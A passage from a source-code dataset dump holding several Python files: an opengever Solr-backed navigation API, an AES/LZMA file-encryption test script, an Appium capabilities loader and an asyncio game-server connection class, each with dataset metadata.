Interface\n\n\n@implementer(IExpandableElement)\n@adapter(Interface, IOpengeverBaseLayer)\nclass Navigation(object):\n\n FIELDS = [\n 'UID',\n 'path',\n 'portal_type',\n 'review_state',\n 'Title',\n 'title_de',\n 'title_en',\n 'title_fr',\n 'Description',\n 'filename',\n 'has_sametype_children',\n 'is_subdossier',\n 'dossier_type',\n ]\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.solr = getUtility(ISolrSearch)\n\n def __call__(self, expand=False):\n root_interface = self.get_root_interface()\n content_interfaces = self.get_content_interfaces()\n\n if self.request.form.get('include_root'):\n content_interfaces.append(root_interface)\n\n result = {\n 'navigation': {\n '@id': '{}/@navigation'.format(self.context.absolute_url()),\n },\n }\n\n if not expand:\n return result\n\n root = self.find_root(root_interface, content_interfaces)\n solr_docs = self.query_solr(root, content_interfaces)\n\n nodes = map(self.solr_doc_to_node, solr_docs)\n result['navigation']['tree'] = make_tree_by_url(nodes)\n\n return result\n\n def find_root(self, root_interface, content_interfaces):\n context = self.context\n\n if root_interface not in content_interfaces:\n while (not root_interface.providedBy(context)\n and not IPloneSiteRoot.providedBy(context)):\n context = aq_parent(context)\n else:\n # This happens i.e. on lookup a dossier tree from a subdossier.\n #\n # The current context is the subdossier which is also\n # providing the root_interface. 
We have to make sure that we return\n            # the uppermost object providing the given root_interface if\n            # the root_interface is within `content_interfaces`\n            current = context\n            while (not IPloneSiteRoot.providedBy(current)):\n                if root_interface.providedBy(current):\n                    context = current\n                current = aq_parent(current)\n\n        if root_interface.providedBy(context):\n            root = context\n        else:\n            response = self.solr.search(\n                filters=make_filters(\n                    object_provides=root_interface.__identifier__),\n                sort='path asc',\n                fl=[\"path\"],\n            )\n            roots = [OGSolrDocument(d) for d in response.docs]\n\n            if roots:\n                root = roots[0].getObject()\n            else:\n                raise BadRequest(\"No root found for interface: {}\".format(\n                    root_interface.__identifier__))\n        return root\n\n    def query_solr(self, root, content_interfaces):\n        query = {\n            'object_provides': [i.__identifier__ for i in content_interfaces],\n            'path_parent': '/'.join(root.getPhysicalPath()),\n            'trashed': 'false',\n        }\n\n        review_states = self.request.form.get('review_state', [])\n        if review_states:\n            query['review_state'] = review_states\n\n        filters = make_filters(**query)\n\n        if self.request.form.get('include_context'):\n            # Include context branch's UIDs in the query, by adding them as\n            # a filter that is OR'ed with the main filters (which themselves\n            # are AND'ed together). This is necessary because restrictions\n            # from the main filters must not be applied to the context branch.\n            context_uids = list(self.get_context_branch_uids(root))\n            if context_uids:\n                context_filter = make_filters(UID=context_uids)[0]\n                main_filters = self._join_filters(make_filters(**query), 'AND')\n                filters = self._join_filters([main_filters, context_filter], 'OR')\n\n        resp = self.solr.search(\n            filters=filters,\n            sort='sortable_title asc',\n            rows=10000,\n            fl=self.FIELDS)\n\n        return [OGSolrDocument(doc) for doc in resp.docs]\n\n    def get_context_branch_uids(self, root):\n        \"\"\"Return UIDs of the current context's chain up to the root.\n        \"\"\"\n        for item in self.context.aq_chain:\n            item_uid = item.UID()\n            if item_uid == root.UID():\n                break\n            yield item_uid\n\n    def _lookup_iface_by_identifier(self, identifier):\n        return resolve(identifier) if identifier else None\n\n    def _join_filters(self, filters, op):\n        op = ' %s ' % op\n        return op.join(['(%s)' % flt for flt in filters])\n\n    def get_root_interface(self):\n        \"\"\"Looks up the root_interface provided in the request parameters.\n\n        This interface is used as the navigation root identifier.\n        \"\"\"\n        interface = self.request.form.get('root_interface')\n        try:\n            return self._lookup_iface_by_identifier(\n                interface) or IRepositoryRoot\n        except ImportError:\n            raise BadRequest(\"The provided `root_interface` could not be \"\n                             \"looked up: {}\".format(interface))\n\n    def get_content_interfaces(self):\n        \"\"\"Looks up the content_interfaces provided in the request parameters.\n\n        The interfaces provided in `content_interfaces` are used as navigation\n        items.\n        \"\"\"\n        interfaces = self.request.form.get('content_interfaces')\n        if not interfaces:\n            return [IRepositoryFolder]\n\n        if not isinstance(interfaces, list):\n            interfaces = [interfaces]\n\n        content_interfaces = []\n        for interface in interfaces:\n            try:\n                content_interfaces.append(\n                    self._lookup_iface_by_identifier(interface))\n            except ImportError:\n                raise BadRequest(\"The provided `content_interfaces` could not be \"\n                                 \"looked up: {}\".format(interface))\n        return content_interfaces\n\n    def solr_doc_to_node(self, solr_doc):\n        wrapper = IContentListingObject(solr_doc)\n        context_url = 
self.context.absolute_url()\n\n node = {\n '@type': wrapper.portal_type,\n 'text': wrapper.Title(),\n 'description': wrapper.Description(),\n 'url': wrapper.getURL(),\n 'uid': wrapper.UID,\n 'active': wrapper.review_state() != REPOSITORY_FOLDER_STATE_INACTIVE,\n 'current': context_url == wrapper.getURL(),\n 'current_tree': context_url.startswith(wrapper.getURL()),\n 'is_leafnode': None,\n 'is_subdossier': wrapper.is_subdossier,\n 'review_state': wrapper.review_state(),\n 'dossier_type': wrapper.dossier_type,\n }\n if wrapper.portal_type == 'opengever.repository.repositoryfolder':\n node['is_leafnode'] = not wrapper.has_sametype_children\n return json_compatible(node)\n\n\nclass NavigationGet(Service):\n\n def reply(self):\n navigation = Navigation(self.context, self.request)\n return navigation(expand=True)['navigation']\n", "sub_path": "opengever/api/navigation.py", "file_name": "navigation.py", "file_ext": "py", "file_size_in_byte": 8202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "zope.component.getUtility", "line_number": 46, "usage_type": "call"}, {"api_name": "ftw.solr.interfaces.ISolrSearch", "line_number": 46, "usage_type": "argument"}, {"api_name": "opengever.base.browser.navigation.make_tree_by_url", "line_number": 68, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 77, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 77, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 78, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 87, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 87, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 90, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 96, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 101, "usage_type": "call"}, {"api_name": "zExceptions.BadRequest", "line_number": 106, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 121, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 130, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 131, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 140, "usage_type": "call"}, {"api_name": "zope.dottedname.resolve.resolve", "line_number": 152, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryroot.IRepositoryRoot", "line_number": 166, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 168, "usage_type": "call"}, {"api_name": "opengever.repository.interfaces.IRepositoryFolder", "line_number": 179, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 190, "usage_type": "call"}, {"api_name": "plone.app.contentlisting.interfaces.IContentListingObject", "line_number": 195, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryfolder.REPOSITORY_FOLDER_STATE_INACTIVE", "line_number": 204, "usage_type": "name"}, {"api_name": "plone.restapi.serializer.converters.json_compatible", "line_number": 214, "usage_type": "call"}, {"api_name": "zope.interface.implementer", "line_number": 23, "usage_type": "call"}, {"api_name": 
"plone.restapi.interfaces.IExpandableElement", "line_number": 23, "usage_type": "argument"}, {"api_name": "zope.component.adapter", "line_number": 24, "usage_type": "call"}, {"api_name": "zope.interface.Interface", "line_number": 24, "usage_type": "argument"}, {"api_name": "opengever.base.interfaces.IOpengeverBaseLayer", "line_number": 24, "usage_type": "argument"}, {"api_name": "plone.restapi.services.Service", "line_number": 217, "usage_type": "name"}]}
+{"seq_id": "412269518", "text": "# -*- coding: utf-8 -*-\n\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nfrom Crypto.Hash import SHA256\nimport pylzma\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('./encrepo'))\nimport hash_helper\nimport pack\nimport time\n\nBS = 32\nAES_KEY_SIZE = 32 #Key is 256 bit\npad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s + (AES_KEY_SIZE - len(s) % AES_KEY_SIZE) \\\n * chr(AES_KEY_SIZE - len(s) % AES_KEY_SIZE)\n\nunpad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s[:-ord(s[len(s)-1])]\n\nclass AESCipher:\n def __init__( self, key ):\n self.key = key\n\n def encrypt( self, raw ):\n raw = pad(raw)\n iv = Random.new().read( AES.block_size )\n cipher = AES.new( self.key, AES.MODE_CBC, iv )\n return base64.b64encode( iv + cipher.encrypt( raw ) )\n\n def decrypt( self, enc ):\n enc = base64.b64decode(enc)\n iv = enc[:16]\n cipher = AES.new(self.key, AES.MODE_CBC, iv )\n return unpad(cipher.decrypt( enc[16:] ))\n\nraw_info = \"\"\"awsome text goes here,\n U cannot see me,\n One good turn deserves another\"\"\"\n\nwith open('/home/xin/iprule') as input_file:\n raw_info = input_file.read()\n\nkey = 'abcdefghijklmnopqrstuvwxyz123456'\n\n\nkey = pad(key)\n\nAES_KEY = 'asdfas2\"%H:%M:%'\n\ndef test_compressed():\n print(\"key=%s length:%d\"%(key,len(key)))\n print(\"Original length of data:%d\"%len(raw_info))\n\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n h = SHA256.new()\n h.update(raw_info)\n print(\"Original hashA:%s\"%h.hexdigest())\n\n\n compressed_info = pylzma.compress(raw_info)\n\n print(\"compressed length of data:%d\"%len(compressed_info))\n\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(compressed_info)\n decrypted = cf.decrypt(encrypted)\n print(\"encrypted length of data:%d\"%len(encrypted))\n decompressed = pylzma.decompress(decrypted)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decompressed))\n\n\n\n\ndef test_run1():\n print(\"Original length of data:%d\"%len(raw_info))\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(raw_info)\n print(\"length of encrypted data:%d\"%len(encrypted))\n compressed_info = pylzma.compress(encrypted)\n print(\"compressed length of encrypted data:%d\"%len(compressed_info))\n\n decompressed = pylzma.decompress(compressed_info)\n decrypted = cf.decrypt(decompressed)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decrypted))\n\n\ndef test_run2():\n info = \"the red fox jumps over the lazy dog\\n\"\n more_info = lambda i : '' if i ==0 else \\\n more_info(i-1) + 'Line {0:10d} : {1}'.format(i, info) * 100\n with open('/tmp/test.txt','w') as afile:\n afile.write(more_info(100))\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n print('{0}:....total={1:20f}, step={2:20f}'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\ndef noautorun_test_pack_large():\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n\n print('{0}:....total={1:12f}, step={2:12f}..starting'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\n #test_file = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n test_file = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n with open(test_file) as afile:\n dgst_original = hash_helper.hash_file(afile)\n #dgst_original ='370cbba5943b5ba6ab868e9f0e098d8ccb8aa5f7396f82ebe22ac6a072c001f8'\n 
print(\"Original SHA256:%s\"%dgst_original)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst original'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n packed_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4.pack'\n unpacked_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.unpack.mp4'\n pack.pack_file(AES_KEY, test_file, packed_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..packing..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n pack.unpack_file(AES_KEY, packed_file_name, unpacked_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..Unpacking..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n with open(unpacked_file_name) as newfile:\n dgst_new = hash_helper.hash_file(newfile)\n\n\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst result..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n print(\"New SHA256:%s\"%dgst_new)\n assert dgst_original == dgst_new\n\ndef noautorun_test_pad():\n with open('/tmp/3.mp4') as afile:\n s = afile.read()\n print(hash_helper.hash_str(s))\n encrypted = pack.encrypt(AES_KEY, s)\n decrypted = pack.decrypt1(AES_KEY, encrypted)\n print(hash_helper.hash_str(decrypted))\n print(unpad(hash_helper.hash_str(decrypted)))\n\ndef split_file_writer(file_name, split_size=32):\n file_size = split_size * 2 ** 20\n sum_len = [0]\n def write_file(buf):\n sum_len[0] += len(buf)\n file_no = sum_len[0] // file_size\n new_filename = file_name if file_no==0 else file_name+'.'+('0000'+str(file_no))[-4:]\n with open(new_filename,'a') as afile:\n afile.write(buf)\n return write_file\n\n\ndef split_file_reader(file_name):\n files = [open(file_name,'r')]\n file_no = [0]\n def read_file(buf_size):\n buf = files[0].read(buf_size)\n if len(buf) == 0:\n file_no[0] += 1\n files[0].close()\n try:\n files[0] = open(file_name+'.'+('0000'+str(file_no[0]))[-4:])\n return read_file(buf_size)\n except IOError:\n return ''\n else:\n return buf\n return read_file\n\ndef tester_split():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n writer = split_file_writer(splited_file_name)\n\n with open(original_file_name) as afile:\n buf = afile.read(65536)\n while len(buf) >0 :\n writer(buf)\n buf = afile.read(65536)\n\ndef tester_combine():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n reader = split_file_reader(splited_file_name)\n with open(recombined_file_name,'w') as afile:\n buf = reader(65536)\n while len(buf)>0:\n afile.write(buf)\n buf = reader(65536)\n\n dgst1 = hash_helper.hash_file(open(original_file_name))\n dgst2 = hash_helper.hash_file(open(recombined_file_name))\n\n assert dgst1 == dgst2\n\n\ntester_combine()\n", "sub_path": "encrypted_file_repo/test/test_run.py", "file_name": "test_run.py", "file_ext": "py", "file_size_in_byte": 7461, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.insert", "line_number": 10, "usage_type": 
"call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Crypto.Random.new", "line_number": 30, "usage_type": "call"}, {"api_name": "Crypto.Random", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.block_size", "line_number": 30, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 31, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 31, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 31, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 35, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 37, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 37, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 37, "usage_type": "attribute"}, {"api_name": "hash_helper.hash_str", "line_number": 58, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256.new", "line_number": 60, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256", "line_number": 60, "usage_type": "name"}, {"api_name": "pylzma.compress", "line_number": 65, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 74, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 75, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 82, "usage_type": "call"}, {"api_name": "pylzma.compress", "line_number": 88, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 91, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 118, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 118, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 125, "usage_type": "call"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 130, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 130, "usage_type": "call"}, {"api_name": "pack.pack_file", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 137, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 139, "usage_type": "call"}, {"api_name": "pack.unpack_file", "line_number": 143, "usage_type": "call"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 146, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 146, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 151, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 156, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 156, 
"usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 166, "usage_type": "call"}, {"api_name": "pack.encrypt", "line_number": 167, "usage_type": "call"}, {"api_name": "pack.decrypt1", "line_number": 168, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 169, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 170, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 224, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 225, "usage_type": "call"}]}
+{"seq_id": "340990095", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom commons import logger\nimport os\n\nimport yaml\nfrom appium import webdriver\n\nlogger = logger.Logger().getLogger()\n\n\ndef appium_desired():\n dirname = os.path.dirname(os.path.dirname(__file__))\n filename = os.path.join(dirname, 'config/kyb_caps.yaml')\n with open(filename, 'r', encoding='utf-8') as file:\n data = yaml.load(file)\n\n base_dir = os.path.dirname(os.path.dirname(__file__))\n app_path = os.path.join(base_dir, 'app', data['appname'])\n desired_caps = {\n \"platformName\": data['platformName'],\n \"platformVersion\": data['platformVersion'],\n\n \"deviceName\": data['deviceName'],\n \"udid\": data['udid'],\n\n \"app\": app_path,\n \"appPackage\": data['appPackage'],\n \"appActivity\": data['appActivity'],\n\n \"automationName\": data['automationName'],\n \"noReset\": data['noReset'],\n\n \"unicodeKeyboard\": data['unicodeKeyboard'],\n \"resetKeyboard\": data['resetKeyboard']\n }\n logger.info('start app......')\n\n driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', desired_caps)\n driver.implicitly_wait(3)\n return driver\n\n\nif __name__ == '__main__':\n appium_desired()\n", "sub_path": "commons/desired_caps.py", "file_name": "desired_caps.py", "file_ext": "py", "file_size_in_byte": 1255, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "commons.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "commons.logger.Logger", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "commons.logger.info", "line_number": 37, "usage_type": "call"}, {"api_name": "commons.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "appium.webdriver.Remote", "line_number": 39, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "200320471", "text": "#!/usr/bin/python3\n\nimport spaceking.net as net\nimport spaceking.common as com\nimport spaceking.log as log\nimport spaceking.event as ev\n\nimport shutil\nimport atexit\nimport os\nimport tempfile\nimport asyncio\nimport socket\n\nEVT_SERVER_RUNNING = 15000\nEVT_SERVER_QUIT = 15001\nEVT_SERVER_CONNECTED = 15002\nEVT_SERVER_DISCONNECTED = 15003\nEVT_SERVER_FAILED_JOIN = 15004\nEVT_SERVER_FAILED_CLIENT = 15005\nEVT_SERVER_NEW_CLIENT = 15006\nEVT_SERVER_DISCONNECTED_CLIENT = 15007\n\n\nclass ServerClient:\n\n __slots__ = [\"uid\", \"addr\", \"reader\", \"writer\"]\n\n def __init__(self, uid, addr, reader, writer):\n self.uid = uid\n self.addr = addr\n self.reader = reader\n self.writer = writer\n\n def __str__(self):\n return \"client: uid={0}, addr={1}\".format(self.uid, self.addr)\n\n\nclass ServerConnection(net.Connection):\n \"\"\"Game server\"\"\"\n\n MAX_CLIENTS = 16\n\n def __init__(self,\n bind_to=None,\n loop=asyncio.get_event_loop(),\n socket_type=\"tcp\"):\n \"\"\"NOTE: with socket_type = unix, the bind_to needs to be None or a\n temporary directory. This directory is removed on exit.\"\"\"\n super().__init__()\n self.clients = []\n self.server = None\n self._uid_cursor = 0 # ringbuf cur.\n self.loop = loop\n\n self.proto_map = {\n \"tcp\": self._start_tcp_server,\n \"unix\": self._start_unix_server\n }\n if socket_type not in self.proto_map:\n raise ValueError(\"socket type: {0} not valid.\".format(socket_type))\n self.socket_type = socket_type\n\n if bind_to is None:\n if socket_type == \"unix\":\n self.bind_to = self._unique_unix_socket_path()\n else:\n self.bind_to = \"localhost\"\n else:\n self.bind_to = bind_to\n\n self.register_handler(net.EVT_PACKET_SEND, self.handle_packet_send)\n\n def _unique_unix_socket_path(self):\n directory = tempfile.mkdtemp(prefix=\"sock-serv\", dir=com.CONFIG_HOME)\n sock_name = \"socket\"\n return os.path.join(directory, \"socket\")\n\n def _create_client(self, uid, *args, **kwargs):\n client = ServerClient(uid, *args, **kwargs)\n self._add_client(client)\n\n def create_evt(pkt):\n return net.NetEvent(net.EVT_PACKET_RECV, uid, pkt)\n\n # Server listens for client packets\n coro = self.listen_packets(client.reader, create_evt)\n task = asyncio.Task(coro, loop=self.loop)\n # Cleanup on socket death\n task.add_done_callback(lambda t: self.disconnect_client(client, t))\n return client\n\n def _add_client(self, client):\n self.clients.append(client)\n\n def _remove_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if idx == uid:\n del self.clients[idx]\n\n def _get_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if client.uid == uid:\n return self.clients[idx]\n\n def _next_uid(self):\n # Spawn new unique client ID. 
ring used for simplicity.\n uid = self._uid_cursor\n self._uid_cursor = (uid + 1) % ServerConnection.MAX_CLIENTS\n return uid\n\n def get_client_count(self):\n return len(self.clients)\n\n @asyncio.coroutine\n def accept_client(self, reader, writer):\n uid = self._next_uid()\n\n remote_addr = self._get_addr(writer)\n if remote_addr is None:\n log.warn(\"Error on client uid={0} connect.\".format(uid))\n return\n\n client = self._create_client(uid, remote_addr, reader, writer)\n\n yield from self.notify(net.NetEvent(EVT_SERVER_NEW_CLIENT, uid))\n log.info(\"{0} connected.\".format(client))\n\n @asyncio.coroutine\n def handle_packet_send(self, event):\n client = self._get_client_by_uid(event.uid)\n if client is None:\n return\n try:\n yield from self.send_packets(client.writer, event.pkt)\n except socket.error as err:\n log.debug(\"Error while sending packets to {0}\".format(client))\n self.disconnect_client(client)\n return\n\n def disconnect_client_by_uid(self, uid):\n # task of disconnect notification is returned\n self._remove_client_by_uid(uid)\n event = net.NetEvent(EVT_SERVER_DISCONNECTED_CLIENT, uid)\n\n task = asyncio.Task(self.notify(event), loop=self.loop)\n return task\n\n def disconnect_client(self, client, client_task=None):\n if client_task:\n try:\n result = client_task.result()\n except Exception as err:\n msg = \"{0} completed with an error. {1}\".format(client, err)\n log.debug(msg)\n\n log.info(\"{0} disconnected.\".format(client))\n self.disconnect_client_by_uid(client.uid)\n\n def _start_server(self, coro):\n try:\n self.server = self.loop.run_until_complete(coro)\n except Exception as err:\n log.error(\"server connection crashed on startup\")\n raise err\n\n def _start_tcp_server(self):\n self._start_server(asyncio.start_server(self.accept_client,\n loop=self.loop,\n host=self.bind_to,\n port=net.SERVER_PORT,\n reuse_address=True))\n\n def _start_unix_server(self):\n def socket_cleanup():\n shutil.rmtree(os.path.dirname(self.bind_to))\n log.debug(\"UNIX socket {0} cleaned up.\".format(self.bind_to))\n\n atexit.register(socket_cleanup)\n self._start_server(asyncio.start_unix_server(self.accept_client,\n path=self.bind_to,\n loop=self.loop))\n\n def start_server(self):\n self.proto_map[self.socket_type]()\n\n log.info(\"spaceking server listening.\")\n self.notify(net.NetEvent(EVT_SERVER_RUNNING, None))\n\n def quit(self):\n log.debug(\"spaceking server connection shutting down.\")\n if self.server:\n self.server.close()\n self.server = None\n self.notify(net.NetEvent(EVT_SERVER_QUIT, None))\n else:\n log.debug(\"Calling quit on a dead server\")\n", "sub_path": "spaceking/server/net.py", "file_name": "net.py", "file_ext": "py", "file_size_in_byte": 6412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "spaceking.net.Connection", "line_number": 39, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 39, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 46, "usage_type": "call"}, {"api_name": "spaceking.net.EVT_PACKET_SEND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 72, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 75, "usage_type": "call"}, {"api_name": "spaceking.common.CONFIG_HOME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "spaceking.common", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 84, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 84, "usage_type": "name"}, {"api_name": "spaceking.net.EVT_PACKET_RECV", "line_number": 84, "usage_type": "attribute"}, {"api_name": "asyncio.Task", "line_number": 88, "usage_type": "call"}, {"api_name": "spaceking.log.warn", "line_number": 121, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 121, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 126, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 126, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 127, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 127, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 115, "usage_type": "attribute"}, {"api_name": "socket.error", "line_number": 136, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 137, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 137, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 129, "usage_type": "attribute"}, {"api_name": "spaceking.net.NetEvent", "line_number": 144, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 144, "usage_type": "name"}, {"api_name": "asyncio.Task", "line_number": 146, "usage_type": "call"}, {"api_name": "spaceking.log.debug", "line_number": 155, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 155, "usage_type": "name"}, {"api_name": "spaceking.log.info", "line_number": 157, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 157, "usage_type": "name"}, {"api_name": "spaceking.log.error", "line_number": 164, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 164, "usage_type": "name"}, {"api_name": "asyncio.start_server", "line_number": 168, "usage_type": "call"}, {"api_name": "spaceking.net.SERVER_PORT", "line_number": 171, "usage_type": "attribute"}, 